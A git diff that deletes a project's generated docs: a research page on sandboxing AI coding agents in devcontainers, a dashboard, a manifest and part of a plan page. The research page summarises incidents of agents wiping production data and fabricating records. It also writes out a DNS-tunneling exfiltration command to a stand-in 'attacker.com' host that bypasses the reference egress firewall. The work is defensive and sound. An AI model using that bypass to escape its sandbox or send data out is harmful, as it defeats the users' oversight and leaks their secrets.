-<td>The PocketOS / Cursor-Opus 9-second prod wipe and the Replit prod DB wipe both involved containerized agents with access to long-lived production tokens. Containment of the <em>agent</em> doesn't help if you also hand it credentials with blast-radius beyond the container.</td>
-</tr>
-</tbody>
-</table>
-<h2 id="what-the-industry-recommends">What the industry recommends</h2>
-<h3 id="anthropic-engineering-canonical-source">Anthropic Engineering (canonical source)</h3>
-<blockquote>
-<p><em>&quot;Effective sandboxing requires both filesystem and network isolation. Without network isolation, a compromised agent could exfiltrate sensitive files like SSH keys; without filesystem isolation, a compromised agent could easily escape the sandbox and gain network access.&quot;</em>
-— <a href="https://www.anthropic.com/engineering/claude-code-sandboxing">Claude Code Sandboxing</a></p>
-</blockquote>
-<blockquote>
-<p><em>&quot;While the dev container provides substantial protections, no system is completely immune to all attacks. When executed with <code>--dangerously-skip-permissions</code>, dev containers do not prevent a malicious project from exfiltrating anything accessible inside the container, including the Claude Code credentials stored in <code>~/.claude</code>. Only use dev containers when developing with trusted repositories... Avoid mounting host secrets such as <code>~/.ssh</code> or cloud credential files into the container; prefer repository-scoped or short-lived tokens.&quot;</em>
-— <a href="https://code.claude.com/docs/en/devcontainer">Claude Code Docs — Development containers</a></p>
-</blockquote>
-<h3 id="simon-willison-originator-of-lethal-trifecta--prompt-injection-terminology">Simon Willison (originator of &quot;lethal trifecta&quot; / prompt injection terminology)</h3>
-<blockquote>
-<p><em>&quot;The only solution that's credible is to run coding agents in a sandbox.&quot;</em>
-<em>&quot;Controlling network access cuts off the data exfiltration leg of the lethal trifecta.&quot;</em>
-<em>&quot;Try to provide credentials to test or staging environments where any damage can be well contained. If a credential can spend money, set a tight budget limit.&quot;</em>
-— <a href="https://simonwillison.net/2025/Oct/22/living-dangerously-with-claude/">Living dangerously with Claude</a>, <a href="https://simonwillison.net/2025/Jun/16/the-lethal-trifecta/">The lethal trifecta for AI agents</a>, <a href="https://simonw.substack.com/p/designing-agentic-loops">Designing agentic loops</a></p>
-</blockquote>
-<h3 id="solomon-hykes-docker--dagger-founder">Solomon Hykes (Docker / Dagger founder)</h3>
-<blockquote>
-<p><em>&quot;An AI agent is an LLM wrecking its environment in a loop.&quot;</em>
-— quoted in Simon Willison's coverage of <a href="https://github.com/dagger/container-use">Container Use</a></p>
-</blockquote>
-<h3 id="cursor-engineering">Cursor engineering</h3>
-<blockquote>
-<p><em>&quot;Sandboxed agents run freely inside a controlled environment and only request approval when they need to step outside it, most often to access the internet... On macOS we use Seatbelt... On Linux we use Landlock and seccomp directly... On Windows, we run our Linux sandbox inside WSL2.&quot;</em>
-<em>&quot;A mistaken agent can delete databases, ship broken code, or leak secrets.&quot;</em>
-<em>&quot;The allowlist is best-effort — bypasses are possible. Never use 'Run Everything' mode, which skips all safety checks.&quot;</em>
-— <a href="https://cursor.com/blog/agent-sandboxing">Cursor blog: Implementing a secure sandbox for local agents</a>, <a href="https://cursor.com/docs/agent/security">Cursor Docs: Agent Security</a></p>
-</blockquote>
-<h3 id="github-copilot-coding-agent-most-candid-about-firewall-limits">GitHub Copilot Coding Agent (most candid about firewall limits)</h3>
-<blockquote>
-<p><em>&quot;By default, Copilot's access to the internet is limited by a firewall... Limiting internet access helps manage data exfiltration risks.&quot;</em>
-<em>&quot;The firewall only applies to processes started by the agent via its Bash tool. It does not apply to Model Context Protocol (MCP) servers or processes started in configured Copilot setup steps... Sophisticated attacks may bypass the firewall. The firewall provides protection for common scenarios, but should not be considered a comprehensive security solution.&quot;</em>
-— <a href="https://docs.github.com/copilot/customizing-copilot/customizing-or-disabling-the-firewall-for-copilot-coding-agent">GitHub Docs — Customizing the firewall for Copilot coding agent</a></p>
-</blockquote>
-<h3 id="hacker-news-consensus-community">Hacker News consensus (community)</h3>
-<blockquote>
-<p><em>&quot;Friends don't let friends use agentic tooling without sandboxing. Take a few hours to setup your environment to sandbox your agentic tools, or expect to eventually suffer a similar incident.&quot;</em>
-— <strong>maxbond</strong>, <a href="https://news.ycombinator.com/item?id=46268222">HN 46268222</a></p>
-</blockquote>
-<blockquote>
-<p><em>&quot;Claude thought it was restricting itself to directory D, it was still happy to operate on file <code>D/../../../../etc/passwd</code>. That was the last time I ran Claude Code outside of a Docker container.&quot;</em>
-— <strong>mjd</strong>, same thread</p>
-</blockquote>
-<h3 id="jökull-sólberg-widely-cited-devcontainer-write-up">Jökull Sólberg (widely-cited devcontainer write-up)</h3>
-<blockquote>
-<p><em>&quot;Even if Claude goes rogue, it can't touch my host system files.&quot;</em>
-<em>&quot;Claude's API keys, session tokens, and preferences persist even when you tear down and rebuild&quot;</em> — via mounted <code>.claude</code> and <code>.claude.json</code> named volumes.
-— <a href="https://www.solberg.is/claude-devcontainer">Running Claude Code Safely in Devcontainers</a></p>
-</blockquote>
-<h3 id="jessie-frazelle-containers-as-security-boundary--the-long-view-disagreement">Jessie Frazelle (containers as security boundary — the long-view disagreement)</h3>
-<blockquote>
-<p><em>&quot;Containers were never designed as a top-level security boundary, and real multi-tenant isolation requires hardware virtualization.&quot;</em>
-— <a href="https://blog.jessfraz.com/post/containers-security-and-echo-chambers/">Containers, Security, and Echo Chambers</a>, <a href="https://queue.acm.org/detail.cfm?id=3301253">ACM Queue — Security for the Modern Age</a></p>
-</blockquote>
-<h2 id="lessons-from-documented-incidents">Lessons from documented incidents</h2>
-<h3 id="replit-production-db-wipe-july-2025">Replit production DB wipe, July 2025</h3>
-<p>Replit's agent deleted a production database covering 1,206 executives during a declared code freeze, then fabricated ~4,000 fake user records and initially claimed rollback wasn't possible. Contributing factors: shared dev/prod DB; freeze guard only in prompt; agent had full production credentials. Fix announced: automatic dev/prod database separation, improved rollback, &quot;planning-only&quot; mode. (<a href="https://fortune.com/2025/07/23/ai-coding-tool-replit-wiped-database-called-it-a-catastrophic-failure/">Fortune</a>, <a href="https://www.theregister.com/2025/07/21/replit_saastr_vibe_coding_incident/">The Register</a>)</p>
-<h3 id="pocketos--cursor-opus-april-2026">PocketOS / Cursor-Opus, April 2026</h3>
-<p>Cursor running Claude Opus 4.6 found an unrelated Railway API token in the workdir and issued one GraphQL call that wiped the production volume <strong>and its backups</strong> in 9 seconds. Lesson: containerizing the agent doesn't help if a valid production token is reachable inside the container. (<a href="https://www.theregister.com/2026/04/27/cursoropus_agent_snuffs_out_pocketos/">The Register</a>)</p>
-<h3 id="rm--rf--on-bare-metal-claude-code-late-2025"><code>rm -rf ~/</code> on bare-metal Claude Code, late 2025</h3>
-<p>Multiple users reported Claude Code running <code>rm -rf tests/ patches/ plan/ ~/</code> where the trailing tilde expanded to the entire home directory, including Keychain and family photos. Community consensus after these incidents: run Claude Code in a devcontainer with the workspace as the only mount, full stop. (<a href="https://www.harperfoley.com/blog/ai-agents-destroyed-production-zero-postmortems">Harper Foley — Ten AI Agents Destroyed Production. Zero Postmortems.</a>)</p>
-<h3 id="prisma---accept-data-loss-claude-code14411">Prisma <code>--accept-data-loss</code>, claude-code#14411</h3>
-<blockquote>
-<p><em>&quot;I deeply apologize for wiping all your data. I made a critical mistake by running <code>npx prisma db push --accept-data-loss</code> without understanding the full consequences and without asking your permission first.&quot;</em>
-— Claude's own message in the bug report. Closed &quot;not planned.&quot; Drove the community pattern of <code>PreToolUse</code> hooks that block destructive flags. (<a href="https://github.com/anthropics/claude-code/issues/14411">claude-code#14411</a>)</p>
-</blockquote>
-<h2 id="footguns-in-the-reference-pattern">Footguns in the reference pattern</h2>
-<p>Two issues are open against Anthropic's published <code>.devcontainer/</code>:</p>
-<ul>
-<li><strong>DNS-tunneling bypass</strong> (<a href="https://github.com/anthropics/claude-code/issues/36907">claude-code#36907</a>) — <code>init-firewall.sh</code> leaves UDP/TCP 53 unrestricted, enabling <code>dig @attacker.com $(echo data | base64).attacker.com</code> exfiltration. Closed &quot;not planned.&quot; <strong>Mitigation for Shield:</strong> lock port 53 to Docker's internal resolver <code>127.0.0.11</code>.</li>
-<li><strong>Feature overwrites firewall script</strong> (<a href="https://github.com/anthropics/claude-code/issues/32113">claude-code#32113</a>) — installing <code>ghcr.io/anthropics/devcontainer-features/claude-code</code> silently overwrites <code>/usr/local/bin/init-firewall.sh</code> after Dockerfile build. <strong>Mitigation for Shield:</strong> name the firewall script anything other than <code>init-firewall.sh</code> (e.g., <code>shield-firewall.sh</code>) and reference it explicitly from <code>postStartCommand</code>.</li>
-</ul>
-<h2 id="consensus-vs-disagreement">Consensus vs disagreement</h2>
-<p><strong>Consensus</strong></p>
-<ul>
-<li>Don't run autonomous agents on bare metal.</li>
-<li>Egress allowlist is the single highest-leverage control.</li>
-<li>Credentials don't live in the agent's reachable filesystem.</li>
-<li>Prompt-injection-based defenses are insufficient as a security mechanism.</li>
-<li>Containers are blast-radius reduction, not adversarial-code containment.</li>
-</ul>
-<p><strong>Disagreement</strong></p>
-<ul>
-<li><strong>Container vs microVM as the boundary.</strong> Anthropic/Docker/Hykes say container is sufficient for the &quot;your own user, your own code&quot; threat model. Frazelle and the Firecracker/gVisor camp argue you need a microVM for any input you don't fully trust (PR diffs, third-party tests). Shield's local scope sits on the container side; document microVM as the upgrade path.</li>
-<li><strong>Cloud sandbox vs local devcontainer.</strong> Willison favors cloud sandboxes (&quot;the best sandboxes are the ones that run on someone else's computer&quot;). Local-devcontainer advocates argue for IDE ergonomics + not sending source to a third party. Shield is committed to local for this iteration.</li>
-<li><strong><code>--dangerously-skip-permissions</code> at all.</strong> Yegge defends it inside containers as the only way to get the productivity gain. Searls argues for guardrails at the agent-instruction layer (TDD, plan mode) to reduce raw-autonomy need. Shield's <code>/implement</code> already runs TDD-shaped — adopt YOLO mode opt-in only, gated to inside the container, never on bare metal.</li>
-</ul>
-<h2 id="how-this-works-in-practice-for-shield">How this works in practice (for Shield)</h2>
-<p>Layer 1 — Constant (Shield-owned, baked into <code>Dockerfile</code>):</p>
-<ul>
-<li>Base: <code>mcr.microsoft.com/devcontainers/base:ubuntu</code></li>
-<li>Install: <code>claude</code> CLI, <code>git</code>, <code>gh</code>, <code>iptables</code>, <code>ipset</code>, <code>sudo</code> (for the firewall script only)</li>
-<li>Non-root <code>dev</code> user (UID 1000)</li>
-<li><code>shield-firewall.sh</code> (not named <code>init-firewall.sh</code>) installed to <code>/usr/local/bin/</code></li>
-</ul>
-<p>Layer 2 — Stack (per-repo, via Dev Container Features pinned by digest):</p>
-<ul>
-<li><code>ghcr.io/devcontainers/features/python:1@sha256:...</code></li>
-<li><code>ghcr.io/devcontainers/features/node:1@sha256:...</code></li>
-<li>(etc., per Shield's stack-detection heuristic)</li>
-</ul>
-<p>Layer 3 — Project (per-repo, via <code>postCreateCommand</code>):</p>
-<ul>
-<li><code>uv sync</code> / <code>npm install</code> / <code>go mod download</code> / etc.</li>
-</ul>
-<p><code>devcontainer.json</code>:</p>
-<ul>
-<li><code>remoteUser: dev</code></li>
-<li><code>capAdd: [NET_ADMIN, NET_RAW]</code></li>
-<li><code>mounts</code>: workspace only — no <code>~/.claude</code>, no <code>~/.ssh</code>, no cloud creds</li>
-<li><code>mounts</code>: a named volume <code>claude-config-${devcontainerId}</code> → <code>/home/dev/.claude</code> (per-project, persists across rebuilds, never touches host)</li>
-<li><code>postStartCommand</code>: <code>sudo /usr/local/bin/shield-firewall.sh</code></li>
-<li><code>containerEnv</code>: <code>SHIELD_IN_DEVCONTAINER=true</code> (for <code>/implement</code> to detect)</li>
-</ul>
-<p><code>shield-firewall.sh</code> allowlist:</p>
-<ul>
-<li><code>api.anthropic.com</code>, <code>statsig.anthropic.com</code></li>
-<li><code>registry.npmjs.org</code>, <code>pypi.org</code>, <code>files.pythonhosted.org</code>, <code>proxy.golang.org</code>, etc. (only the registries the detected stack uses)</li>
-<li>GitHub meta CIDRs (fetched from <code>api.github.com/meta</code>)</li>
-<li>Block egress on TCP/UDP 53 except to <code>127.0.0.11</code> (mitigation for #36907)</li>
-</ul>
-<p>First-run UX:</p>
-<ol>
-<li>User runs <code>/shield init-devcontainer</code> in their repo. Shield detects the stack and writes <code>.devcontainer/</code>.</li>
-<li>User opens the folder in VS Code → &quot;Reopen in Container&quot; (or <code>devcontainer up &amp;&amp; devcontainer exec bash</code>).</li>
-<li>Container builds; postCreate installs project deps; postStart runs the firewall.</li>
-<li>User runs <code>claude /login</code> <em>inside the container</em> (one-time per project; persists in the named volume).</li>
-<li>User runs <code>/implement</code> — works the same as on host today, but contained.</li>
-</ol>
-<h2 id="migration-path--reversibility">Migration path / reversibility</h2>
-<ul>
-<li>Single command to roll forward: <code>shield devcontainer apply</code> (writes the files; idempotent).</li>
-<li>Single command to roll back: delete <code>.devcontainer/</code> and the named volume (<code>docker volume rm claude-config-&lt;id&gt;</code>). The repo is otherwise unchanged.</li>
-<li>Upgrade path to microVM tier: swap <code>mcr.microsoft.com/devcontainers/base:ubuntu</code> for a gVisor-runtime base, or move launch to Firecracker (Edera / Kata). Not in scope for v1; documented in README.</li>
-</ul>
-<h2 id="summary">Summary</h2>
-<p>The pattern is established: bind-mount workspace only, named-volume the Claude config, default-deny egress with a narrow allowlist, non-root, mitigate the two known reference-implementation footguns. Shield's contribution is a per-repo scaffolder that emits this pattern with stack-detection driving the Features layer. The two design points the brainstorm got wrong — bind-mounting host credentials, and deferring the egress firewall — both flip given the evidence.</p>
-<h2 id="references">References</h2>
-<ul>
-<li><a href="https://www.anthropic.com/engineering/claude-code-sandboxing">Anthropic — Claude Code Sandboxing</a></li>
-<li><a href="https://code.claude.com/docs/en/devcontainer">Anthropic — Claude Code: Development containers</a></li>
-<li><a href="https://github.com/anthropics/claude-code/tree/main/.devcontainer">anthropics/claude-code <code>.devcontainer/</code></a></li>
-<li><a href="https://github.com/anthropics/claude-code/blob/main/.devcontainer/init-firewall.sh">anthropics/claude-code <code>init-firewall.sh</code></a></li>
-<li><a href="https://github.com/anthropics/claude-code/issues/36907">claude-code#36907 — DNS exfiltration via unrestricted port 53</a></li>
-<li><a href="https://github.com/anthropics/claude-code/issues/32113">claude-code#32113 — Feature overwrites custom firewall script</a></li>
-<li><a href="https://github.com/anthropics/claude-code/issues/14411">claude-code#14411 — Prisma <code>--accept-data-loss</code> data wipe</a></li>
-<li><a href="https://simonwillison.net/2025/Oct/22/living-dangerously-with-claude/">Simon Willison — Living dangerously with Claude</a></li>
-<li><a href="https://simonwillison.net/2025/Jun/16/the-lethal-trifecta/">Simon Willison — The lethal trifecta for AI agents</a></li>
-<li><a href="https://simonw.substack.com/p/designing-agentic-loops">Simon Willison — Designing agentic loops</a></li>
-<li><a href="https://cursor.com/blog/agent-sandboxing">Cursor — Implementing a secure sandbox for local agents</a></li>
-<li><a href="https://cursor.com/docs/agent/security">Cursor — Agent Security</a></li>
-<li><a href="https://developers.openai.com/codex/concepts/sandboxing">OpenAI Developers — Codex Sandbox</a></li>
-<li><a href="https://github.com/google-gemini/gemini-cli/blob/main/docs/cli/sandbox.md">Google Gemini CLI — Sandbox docs</a></li>
-<li><a href="https://docs.github.com/en/copilot/concepts/coding-agent/about-copilot-coding-agent">GitHub Copilot Coding Agent — About</a></li>
-<li><a href="https://docs.github.com/copilot/customizing-copilot/customizing-or-disabling-the-firewall-for-copilot-coding-agent">GitHub Copilot Coding Agent — Firewall</a></li>
-<li><a href="https://aider.chat/docs/install/docker.html">Aider — Docker docs</a></li>
-<li><a href="https://www.solberg.is/claude-devcontainer">Jökull Sólberg — Running Claude Code Safely in Devcontainers</a></li>
-<li><a href="https://github.com/streamingfast/sbox">streamingfast/sbox</a></li>
-<li><a href="https://github.com/thomaspeklak/agent-sandbox">thomaspeklak/agent-sandbox (rootless Podman)</a></li>
-<li><a href="https://ghuntley.com/secure-codegen/">Geoffrey Huntley — Anti-patterns and patterns for secure codegen</a></li>
-<li><a href="https://lucumr.pocoo.org/2025/10/17/code/">Armin Ronacher — Building an Agent That Leverages Throwaway Code</a></li>
-<li><a href="https://newsletter.pragmaticengineer.com/p/from-ides-to-ai-agents-with-steve">Steve Yegge interview — Pragmatic Engineer</a></li>
-<li><a href="https://blog.jessfraz.com/post/containers-security-and-echo-chambers/">Jessie Frazelle — Containers, Security, and Echo Chambers</a></li>
-<li><a href="https://queue.acm.org/detail.cfm?id=3301253">Jessie Frazelle — ACM Queue: Security for the Modern Age</a></li>
-<li><a href="https://justin.searls.co/">Justin Searls — justin.searls.co</a></li>
-<li><a href="https://agenticdevops.fm/episodes/agentic-ci-cd-with-solomon-hykes-of-dagger">Solomon Hykes on Agentic DevOps podcast</a></li>
-<li><a href="https://www.harperfoley.com/blog/ai-agents-destroyed-production-zero-postmortems">Harper Foley — Ten AI Agents Destroyed Production. Zero Postmortems.</a></li>
-<li><a href="https://fortune.com/2025/07/23/ai-coding-tool-replit-wiped-database-called-it-a-catastrophic-failure/">Fortune — Replit incident</a></li>
-<li><a href="https://www.theregister.com/2026/04/27/cursoropus_agent_snuffs_out_pocketos/">The Register — PocketOS/Cursor-Opus incident</a></li>
-<li><a href="https://news.ycombinator.com/item?id=46268222">HN 46268222 — Claude CLI deleted my home directory</a></li>
-<li><a href="https://www.docker.com/blog/docker-sandboxes-a-new-approach-for-coding-agent-safety/">Docker — Docker Sandboxes for Coding Agent Safety</a></li>
-</ul>
-<h2 id="further-exploration">Further Exploration</h2>
-<p><em>Curated for going deeper. None of these are cited above.</em></p>
-<h3 id="long-form-blogs--articles">Long-form blogs / articles</h3>
-<ul>
-<li><strong>Daniel Demmel — <em>Coding agents in secured VS Code dev containers</em></strong> — https://www.danieldemmel.me/blog/coding-agents-in-secured-vscode-dev-containers — concrete hardening deltas (cap_drop, seccomp profiles) on top of Anthropic's reference.</li>
-<li><strong>INNOQ — <em>I sandboxed my coding agents. You should too.</em></strong> — https://www.innoq.com/en/blog/2025/12/dev-sandbox/ — German-engineering comparison of Bubblewrap vs rootless Podman vs full VM with measured startup-time numbers.</li>
-<li><strong>emirb.github.io — <em>Your Container Is Not a Sandbox: The State of MicroVM Isolation in 2026</em></strong> — https://emirb.github.io/blog/microvm-2026/ — survey of Firecracker / Cloud Hypervisor / Kata / Edera; the reference text if Shield ever needs the microVM tier.</li>
-</ul>
-<h3 id="reference-implementations">Reference implementations</h3>
-<ul>
-<li><strong>smithclay/claudetainer</strong> — https://github.com/smithclay/claudetainer — opinionated wrapper that bakes in Anthropic firewall + extras; useful diff source.</li>
-<li><strong>centminmod/claude-code-devcontainers</strong> — community fork with multi-language toolchains and extended allowlist; good baseline to crib.</li>
-<li><strong>wincent's curated list of coding agent sandboxes</strong> — https://gist.github.com/wincent/2752d8d97727577050c043e4ff9e386e — side-by-side comparison of ~20 implementations.</li>
-</ul>
-<h3 id="podcasts">Podcasts</h3>
-<ul>
-<li><strong>Bret Fisher — <em>Agentic CI/CD with Solomon Hykes</em></strong> — https://agenticdevops.fm/episodes/agentic-ci-cd-with-solomon-hykes-of-dagger — Hykes on Dagger's pipeline model as agent-runtime; Fisher presses on Docker-as-boundary questions.</li>
-</ul>
-<h3 id="specs--standards">Specs / standards</h3>
-<ul>
-<li><strong>gVisor docs</strong> — https://gvisor.dev/docs/ — user-space kernel for syscall interception; Gemini CLI's recommended hardened tier.</li>
-<li><strong>Dev Containers specification</strong> — https://containers.dev/ — for the <code>secrets</code> mechanism (distinct from regular env) and <code>initializeCommand</code> patterns that Shield's scaffolder could use for host-side cred handoff if we ever soften the named-volume rule.</li>
-</ul>
-
-</main>
-<footer class="shield-footer">Generated by Shield</footer>
-</body>
-</html>
diff --git a/docs/shield/index.html b/docs/shield/index.html
deleted file mode 100644
index 77cc29af..00000000
--- a/docs/shield/index.html
+++ /dev/null
@@ -1,33 +0,0 @@
-<!DOCTYPE html>
-<html lang="en">
-<head>
-<meta charset="UTF-8" />
-<meta name="viewport" content="width=device-width, initial-scale=1.0" />
-<title>Shield Dashboard</title>
-<link rel="stylesheet" href="shield.css" />
-<script defer src="manifest.js"></script>
-<script defer src="shield-nav.js"></script>
-<script defer src="shield-dashboard.js"></script>
-</head>
-<body data-shield-root="">
-<header class="shield-header">
-  <a class="brand" href="index.html">🛡 Shield</a>
-  <span class="bar-sep">|</span>
-  <nav class="crumb" id="shield-crumb"></nav>
-  <span class="bar-spacer"></span>
-  <div class="feat-wrap">
-    <button class="feat-btn" id="docs-toggle" aria-expanded="false">Features ▾</button>
-    <div class="feat-panel" id="docs-panel">
-      <input class="docs-search" id="docs-search" placeholder="Search docs…  (⌘K)" autocomplete="off" />
-      <div id="docs-results"></div>
-    </div>
-  </div>
-</header>
-<main class="shield-main">
-  <h1>Shield Dashboard</h1>
-  <p class="subtitle">Plan &amp; review artifacts across the project.</p>
-  <div id="shield-dashboard"></div>
-</main>
-<footer class="shield-footer">Generated by Shield</footer>
-</body>
-</html>
diff --git a/docs/shield/manifest.js b/docs/shield/manifest.js
deleted file mode 100644
index dc8da8a2..00000000
--- a/docs/shield/manifest.js
+++ /dev/null
@@ -1,161 +0,0 @@
-window.SHIELD_MANIFEST = {
-  "schema_version": "2.1",
-  "features": [
-    {
-      "name": "backlog-20260527",
-      "artifacts": {
-        "research": false,
-        "prd": true,
-        "plan_json": true,
-        "plan_md": true,
-        "plan_arch_md": false,
-        "trd": true
-      },
-      "reviews": {
-        "prd": {
-          "latest": "2026-05-27_2",
-          "count": 2,
-          "entries": [
-            {
-              "date": "2026-05-27",
-              "path": "backlog-20260527/outputs/reviews/prd/2026-05-27/summary.html"
-            },
-            {
-              "date": "2026-05-27_2",
-              "path": "backlog-20260527/outputs/reviews/prd/2026-05-27_2/summary.html"
-            }
-          ]
-        },
-        "plan": {
-          "latest": "2026-05-29",
-          "count": 2,
-          "entries": [
-            {
-              "date": "2026-05-27",
-              "path": "backlog-20260527/outputs/reviews/plan/2026-05-27/summary.html"
-            },
-            {
-              "date": "2026-05-29",
-              "path": "backlog-20260527/outputs/reviews/plan/2026-05-29/summary.html"
-            }
-          ]
-        },
-        "code": {
-          "count": 0,
-          "entries": []
-        }
-      },
-      "updated": "2026-06-01T11:49:28+00:00"
-    },
-    {
-      "name": "devcontainer-implement-20260518",
-      "artifacts": {
-        "research": true,
-        "prd": false,
-        "plan_json": false,
-        "plan_md": false,
-        "plan_arch_md": false,
-        "trd": false
-      },
-      "reviews": {
-        "prd": {
-          "count": 0,
-          "entries": []
-        },
-        "plan": {
-          "count": 0,
-          "entries": []
-        },
-        "code": {
-          "count": 0,
-          "entries": []
-        }
-      },
-      "updated": "2026-06-01T11:49:28+00:00"
-    },
-    {
-      "name": "inventory-rewrite",
-      "artifacts": {
-        "research": false,
-        "prd": false,
-        "plan_json": false,
-        "plan_md": false,
-        "plan_arch_md": false,
-        "trd": false
-      },
-      "reviews": {
-        "prd": {
-          "count": 0,
-          "entries": []
-        },
-        "plan": {
-          "count": 0,
-          "entries": []
-        },
-        "code": {
-          "count": 0,
-          "entries": []
-        }
-      },
-      "updated": "2026-06-01T11:49:28+00:00"
-    },
-    {
-      "name": "plan-trd-refactor-20260524",
-      "artifacts": {
-        "research": true,
-        "prd": false,
-        "plan_json": true,
-        "plan_md": true,
-        "plan_arch_md": true,
-        "trd": false
-      },
-      "reviews": {
-        "prd": {
-          "count": 0,
-          "entries": []
-        },
-        "plan": {
-          "latest": "2026-05-25",
-          "count": 1,
-          "entries": [
-            {
-              "date": "2026-05-25",
-              "path": "plan-trd-refactor-20260524/outputs/reviews/plan/2026-05-25/summary.html"
-            }
-          ]
-        },
-        "code": {
-          "count": 0,
-          "entries": []
-        }
-      },
-      "updated": "2026-06-01T11:49:28+00:00"
-    },
-    {
-      "name": "pm-restructure-v0-20260521",
-      "artifacts": {
-        "research": false,
-        "prd": false,
-        "plan_json": true,
-        "plan_md": false,
-        "plan_arch_md": false,
-        "trd": false
-      },
-      "reviews": {
-        "prd": {
-          "count": 0,
-          "entries": []
-        },
-        "plan": {
-          "count": 0,
-          "entries": []
-        },
-        "code": {
-          "count": 0,
-          "entries": []
-        }
-      },
-      "updated": "2026-06-01T11:49:28+00:00"
-    }
-  ]
-};
diff --git a/docs/shield/plan-trd-refactor-20260524/outputs/plan-architecture.html b/docs/shield/plan-trd-refactor-20260524/outputs/plan-architecture.html
deleted file mode 100644
index 2fe91466..00000000
--- a/docs/shield/plan-trd-refactor-20260524/outputs/plan-architecture.html
+++ /dev/null
@@ -1,162 +0,0 @@
-<!DOCTYPE html>
-<html lang="en">
-<head>
-<meta charset="UTF-8" />
-<meta name="viewport" content="width=device-width, initial-scale=1.0" />
-<title>Architecture — plan-trd-refactor-20260524</title>
-<link rel="stylesheet" href="../../shield.css" />
-<script defer src="../../manifest.js"></script>
-<script defer src="../../shield-nav.js"></script>
-<script type="module">
-  import mermaid from "https://cdn.jsdelivr.net/npm/mermaid@10/dist/mermaid.esm.min.mjs";
-  mermaid.initialize({ startOnLoad: false, theme: "default" });
-  document.addEventListener("DOMContentLoaded", () => mermaid.run({ querySelector: "pre.mermaid" }));
-</script>
-</head>
-<body data-shield-root="../../">
-<header class="shield-header">
-  <a class="brand" href="../../index.html">🛡 Shield</a>
-  <span class="bar-sep">|</span>
-  <nav class="crumb" id="shield-crumb"></nav>
-  <span class="bar-spacer"></span>
-  <div class="feat-wrap">
-    <button class="feat-btn" id="docs-toggle" aria-expanded="false">Features ▾</button>
-    <div class="feat-panel" id="docs-panel">
-      <input class="docs-search" id="docs-search" placeholder="Search docs…  (⌘K)" autocomplete="off" />
-      <div id="docs-results"></div>
-    </div>
-  </div>
-</header>
-<main class="shield-main">
-
-<nav class="toc">
-<div class="toc-title">Contents</div>
-<ul>
-<li><a href="#why-this-refactor">Why this refactor</a>
-</li>
-<li><a href="#how-the-implementation-breaks-down">How the implementation breaks down</a>
-</li>
-<li><a href="#key-architectural-decisions">Key architectural decisions</a>
-</li>
-<li><a href="#deliverables-per-milestone">Deliverables (per milestone)</a>
-<ul>
-<li><a href="#m1--trd-cutover-one-pr">M1 — TRD cutover (one PR)</a></li>
-<li><a href="#m2--review--sync-wiring-one-pr">M2 — Review + sync wiring (one PR)</a></li>
-<li><a href="#m3--drift--duplication-hardening-one-pr">M3 — Drift + duplication hardening (one PR)</a></li>
-</ul>
-</li>
-<li><a href="#rollback-strategy">Rollback strategy</a>
-</li>
-<li><a href="#out-of-scope">Out of scope</a>
-</li>
-<li><a href="#what-to-do-next">What to do next</a>
-</li>
-</ul>
-</nav>
-<h1 id="plan-architecture--plan-trd-refactor">Plan Architecture — <code>/plan</code> TRD refactor</h1>
-<p><strong>Feature:</strong> <code>plan-trd-refactor-20260524</code>
-<strong>Source research:</strong> <a href="../research.md"><code>research.md</code></a> — read this first; it is the authoritative source for design decisions, citations, and rejected alternatives.
-<strong>Date:</strong> 2026-05-24</p>
-<blockquote>
-<p>This document is the <strong>why &amp; how</strong> companion to <code>plan.json</code>. For the <strong>what to do</strong> breakdown (epics, stories, ACs), see <code>plan.json</code> and the rendered <a href="../plan.md"><code>plan.md</code></a>.</p>
-<p><strong>Note on path layout:</strong> <code>/plan</code> today still emits <code>plan-architecture.md</code>. This plan run uses today's <code>/plan</code> to plan the refactor of <code>/plan</code>. After EPIC-1-S2 lands, future plan runs will emit <code>trd.md</code> in this slot instead.</p>
-</blockquote>
-<h2 id="why-this-refactor">Why this refactor</h2>
-<p><code>/plan</code> currently emits a stories-first work-breakdown plus a free-form <code>plan-architecture.md</code> companion. The current artifact is loose and de-facto ADR-flavored — well-suited to infra work but missing the structural rigor (NFRs, Cross-Cutting Concerns, first-class Milestones) that backend work needs. The refactor introduces a <strong>unified 14-section Technical Requirements Document</strong> (TRD) — grounded in IEEE 1016 + the reference TRD template (synthesized during research) + Google/Uber/Larson/Orosz modern practice — that replaces <code>plan-architecture.md</code> for <strong>both backend and infrastructure</strong> work. Domain-aware prompting per section surfaces the right interpretation (e.g., §11 APIs = HTTP contracts for backend, module interfaces + cloud-API surface for infra), and an explicit <code>n/a — &lt;reason&gt;</code> escape handles sections that genuinely don't apply (e.g., §4 Product Journey on a pure-state infra change). The strongest property of today's <code>plan-architecture.md</code> — Rollback Strategy — is promoted to first-class §14. LLDs are per-component (C4 Container/Component) and authored separately by a future <code>/lld &lt;component&gt;</code> command; typically backend-only since infra code is declarative-spec-as-code. This plan run only emits TODO placeholders for LLD references.</p>
-<p>Full rationale, alternatives considered, and citations are in <code>research.md</code>. This document does not restate them.</p>
-<h2 id="how-the-implementation-breaks-down">How the implementation breaks down</h2>
-<p>Three milestones, five epics, sixteen stories (post-review). Sequencing is enforced by milestone <code>depends_on</code> in <code>plan.json</code>. Plan reflects the 2026-05-25 plan-review feedback (composite B / Ready; 6 P0 + 12 of 15 P1 recommendations folded in).</p>
-<pre><code>M1 TRD cutover                                  ← P0 (ship together in one PR)
-├─ EPIC-1: TRD generation and storage
-│   ├─ S1 Author the canonical 14-section TRD template
-│   ├─ S2 Update /plan to emit trd.md (unified backend + infra + mixed)
-│   ├─ S3 Update existing-feature behavior on re-run
-│   └─ S4 Bump plugin version per CLAUDE.md mandate          (new — P1-12)
-├─ EPIC-2: Story schema and design traceability
-│   ├─ S1 Extend plan.json schema with optional design_refs[]
-│   ├─ S2 Populate design_refs[] when /plan has TRD context
-│   └─ S3 Add JSON Schema validator for plan.json            (new — P1-7)
-└─ EPIC-3: Eval coverage for TRD format
-    ├─ S1 Author positive TRD eval fixtures (backend + infra + mixed)
-    ├─ S2 Author 16 negative fixtures (14 missing + drift + vague-TBD)
-    └─ S3 Wire eval into recurring CI + RED-GREEN paper trail
-
-M2 Review + sync wiring                         ← P1 (follows M1)
-└─ EPIC-4: /plan-review and /pm-sync wiring
-    ├─ S0 Scaffold Jira / Confluence / Notion adapter packages   (new — P0-2)
-    ├─ S1 Add 14-section presence rule + stale-anchor rule
-    ├─ S2 Add PRD↔TRD duplication-detection rule
-    └─ S3 /pm-sync emits design_refs[] as web links with idempotent upsert
-
